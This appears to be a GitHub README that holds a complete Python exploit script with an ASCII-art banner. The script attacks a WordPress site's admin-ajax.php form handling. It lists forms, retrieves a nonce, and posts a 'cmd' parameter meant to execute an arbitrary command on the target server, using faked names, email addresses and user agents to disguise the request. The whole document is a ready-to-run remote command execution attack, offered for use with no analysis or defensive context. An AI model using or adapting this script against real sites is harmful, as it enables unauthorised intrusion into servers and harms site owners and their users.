README.md
Rendering markdown...
import requests
from faker import Faker
from urllib.parse import urlparse
import time
import sys
import click
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
banner = r"""
.=+*+++-
=#***#**##.:-.
-#**#####*#*.:
:#*#%@#+#@%#.-
=##*%##***#%=**#*=-.
***#*%#%#####*****+*=
-#%*############*=***+*+-
:%%#***#####*****#@#*#*#***+=:
.=#####**#*******#%%%####*******+-.
:*##%###*#*#%%##***%%%%%%%#**********#*+-
:*#******##%#####%%%%##***#%%%##***********:
=###****#***#***##*##********#%%%%#***********
:#********#**#*+*##*###**###+**###%%%%###****#**.
+#*********%***===++#+*##*=+=====+*##==*##%%%%#-
.=*#####***#%%%#**++===+++#*+++++++=++*## :::
:-*********##*=%%%#=++++++*++++++=====++++%%:
:=*#*********##- :%%%#+======================#%#.
=*##*********#*. .#%%%*+======================+#%*
.-+*##********#%#. .*%%#*+========+++++++=========##%*:
:*******#***##%#= :*%%%%**+=======================+***%%#=:::::-===========--:
.#***#*###**##%%%+=+#%%%%%%##*====================+*###%%%%%%#########***********=.
-*+=++=+*==+*+*%#****###%%%%%%%%#***##*****#####*#%%%%%%%#%*************************
.*#==+==+==+##+=******###*#####%%%%%%%%%%%%%%%%%%%####*******###********************#=
:*#+=*==*==**#++#*********##*******######%%####*************##*****#***************##*
.##*#==*+=*=+#*##**************************#*==+++++*+*****************************#%%*
.#%%##**+*#*#*#******************************#+=====++++**#****************#***####%%%#.
:*%%%%%#*#***********************************#+=++===+***+****#####***#####**##%%%%%#=.
-%%%%%####***********************************++++==++*+*######*############%#%###*=
.::-*+*+#%%#*##******+*##*#####*---...::=*+++##***+*++=---:=+:++-%*==+--:.: . .
..--:-==--: .:+##+-.
"""
class ExploitScript:
def __init__(self, url: str, cmd: str):
self.url = url
self.cmd = cmd
self.form_id = None
@staticmethod
def display_banner() -> None:
print(banner)
@staticmethod
def spinner(duration=10, interval=0.1) -> None:
spinner_chars = ["|", "/", "-", "\\"]
end_time = time.time() + duration
while time.time() < end_time:
for char in spinner_chars:
sys.stdout.write(f"\r[{char}] Exploit loading, please wait...")
sys.stdout.flush()
time.sleep(interval)
print("")
def get_base_url(self) -> str:
parsed_url = urlparse(self.url)
return f"{parsed_url.scheme}://{parsed_url.netloc}"
def fetch_form_id(self) -> None:
base_url = self.get_base_url()
req_url = f"{base_url}/wp-admin/admin-ajax.php"
data = {"action": "form_search"}
response = requests.post(req_url, data=data)
if response.status_code == 200:
form_data = response.json()
ids = [item["id"] for item in form_data]
names = [item["name"] for item in form_data]
print("[+] Available Forms:")
for id, name in zip(ids, names):
print(f" {id}: {name}")
self.form_id = input("[+] Select Form ID >>> ").strip()
else:
print(f"[-] Failed to fetch forms: {response.status_code}")
exit(1)
def fetch_nonce(self) -> str:
base_url = self.get_base_url()
req_url = f"{base_url}/wp-admin/admin-ajax.php"
self.fetch_form_id()
data = {"action": "form_nonce", "form_id": self.form_id}
response = requests.post(req_url, data=data)
if response.status_code == 200:
nonce = response.json().get("data", "")
print(f"[+] Nonce Retrieved: {nonce}")
return nonce
else:
print(f"[-] Failed to fetch nonce: {response.status_code}")
exit(1)
def prepare_payload(self) -> dict:
nonce = self.fetch_nonce()
fake = Faker()
payload = {
"form_id": self.form_id,
"nonce": nonce,
"first_name": fake.first_name(),
"last_name": fake.last_name(),
"email": fake.email(),
"action": "process_form",
"cmd": self.cmd,
}
return payload
def send_request(self) -> None:
base_url = self.get_base_url()
req_url = f"{base_url}/wp-admin/admin-ajax.php"
payload = self.prepare_payload()
headers = {"User-Agent": Faker().user_agent()}
response = requests.post(req_url, data=payload, headers=headers)
if response.ok:
print("[+] Exploit delivered successfully.")
else:
print(f"[-] Exploit failed: {response.status_code}")
@click.command()
@click.option("--url", required=True, help="Target URL")
@click.option("--cmd", default="/tmp/test", help="Command to execute")
def main(url: str, cmd: str) -> None:
exploit = ExploitScript(url, cmd)
exploit.display_banner()
exploit.spinner(duration=1)
exploit.send_request()
if __name__ == "__main__":
main()